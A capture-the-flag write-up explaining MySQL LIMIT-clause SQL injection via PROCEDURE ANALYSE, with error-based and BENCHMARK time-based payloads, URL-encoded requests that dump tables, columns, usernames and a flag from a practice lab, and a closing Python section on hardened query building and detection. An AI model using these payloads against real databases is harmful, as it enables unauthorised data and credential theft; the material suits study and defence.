MySQL LIMIT injection method (this method applies only to 5.0.0 < MySQL < 5.6.6)


The SQL statement looks like the following (this method applies only to versions 5.0.0 < MySQL < 5.6.6):

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT (injection point)

The crux of the problem is that the statement contains an ORDER BY clause. In MySQL, UNION may appear before ORDER BY, so if there were no ORDER BY ahead of the injection point, UNION could be used; but in this case the injection point comes after ORDER BY.

Let's first look at the SELECT syntax in the MySQL 5.x documentation:

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

 

Two clauses can follow LIMIT: PROCEDURE and INTO. INTO cannot be exploited unless the account has the privilege to write a shell file to disk, so the focus here is the PROCEDURE keyword. The only procedure available in MySQL by default is ANALYSE.

Try this procedure:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
 
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE accepts two arguments, so try it with two:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
 
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Insert an SQL expression inside ANALYSE: sleep is not executed, but error-based injection can be used:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

If error-based injection is not available, time-based injection also works; sleep alone does not work here, so BENCHMARK must be used instead:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

 

Example (from 網絡安全實驗室|網絡信息安全攻防學習平台, injection challenge 4: http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1):

1. Using PROCEDURE ANALYSE:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1

Can't use ORDER clause with this procedure
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

2. Using error-based injection to dump table names:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23

XPATH syntax error: ':article,user'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Table names obtained: article,user

3. Dump column names:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x61727469636c65))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,title,contents,isread'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Column names of the article table: id,title,contents,isread

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,username,password,lastloginI'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Likewise, column names of the user table: id,username,password,lastloginI

4. Dump field contents:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(username)%20from%20user))),1)%23%20&num=1

XPATH syntax error: ':user,admin,flag'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Querying the username column of the user table shows that one of the entries is flag, so the contents of the flag entry can be read directly:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(password)%20from%20user%20where%20username=0x666c6167))),1)%23%20&num=1

XPATH syntax error: ':myflagishere'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Flag obtained: myflagishere
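As an added example (not part of the original post or the lab site), the Python below shows the application-side pattern behind the technique described above and in the lab walkthrough: request values spliced straight into LIMIT, the hardened form that validates them as bounded integers and binds them as driver parameters, and a log check that flags PROCEDURE ANALYSE appearing after LIMIT. The table name, column name, bounds and the DB-API %s placeholder style are assumptions.

```python
import re
from typing import Optional, Tuple

# Constructed sample values for the page's two LIMIT parameters (start, num);
# the tampered ones follow the payload shape shown on the page, not captured traffic.
SAMPLE_PARAMS = [
    ("0", "1"),
    ("0 PROCEDURE ANALYSE(1)#", "1"),
    ("6", "1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)#"),
]

def build_query_vulnerable(start: str, num: str) -> str:
    """The pattern the page exploits: untrusted strings spliced straight into LIMIT."""
    return f"SELECT field FROM article WHERE id > 0 ORDER BY id LIMIT {start},{num}"

def parse_limit_value(raw: str, upper: int) -> Optional[int]:
    """Accept only a plain decimal integer within [0, upper]; reject anything else.
    A strict regex is used instead of int(), which tolerates whitespace, '+' and '_'."""
    if not re.fullmatch(r"\d{1,9}", raw):
        return None
    value = int(raw)
    return value if value <= upper else None

def build_query_safe(start: str, num: str, max_rows: int = 100) -> Optional[Tuple[str, Tuple[int, int]]]:
    """Hardened form: validated integers handed to the driver as bound parameters
    (assumes a DB-API driver with %s placeholders). Returns None on invalid input."""
    offset = parse_limit_value(start, 1_000_000)
    count = parse_limit_value(num, max_rows)
    if offset is None or count is None:
        return None
    return ("SELECT field FROM article WHERE id > 0 ORDER BY id LIMIT %s,%s", (offset, count))

# Detection: PROCEDURE ANALYSE( after LIMIT in a query recorded by the application
# or the MySQL general log. Legitimate use of this clause is rare, so it is a strong signal.
LIMIT_PROCEDURE = re.compile(r"\bLIMIT\b[^;]*?\bPROCEDURE\s+ANALYSE\s*\(", re.IGNORECASE)

def is_limit_procedure_injection(query: str) -> bool:
    return LIMIT_PROCEDURE.search(query) is not None

def audit(params=SAMPLE_PARAMS):
    """Run each sample pair through both builders; returns (flagged_vulnerable, accepted_safe)."""
    flagged = [is_limit_procedure_injection(build_query_vulnerable(s, n)) for s, n in params]
    accepted = [build_query_safe(s, n) is not None for s, n in params]
    return flagged, accepted

if __name__ == "__main__":
    for (s, n), hit, ok in zip(SAMPLE_PARAMS, *audit()):
        print(f"start={s!r} num={n!r}: detector={'HIT' if hit else 'clean'}, hardened={'accepted' if ok else 'rejected'}")
```

The detector only covers the PROCEDURE path shown on this page; a server that still exposes PROCEDURE ANALYSE is below MySQL 5.7.18, which is itself worth flagging during an audit.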
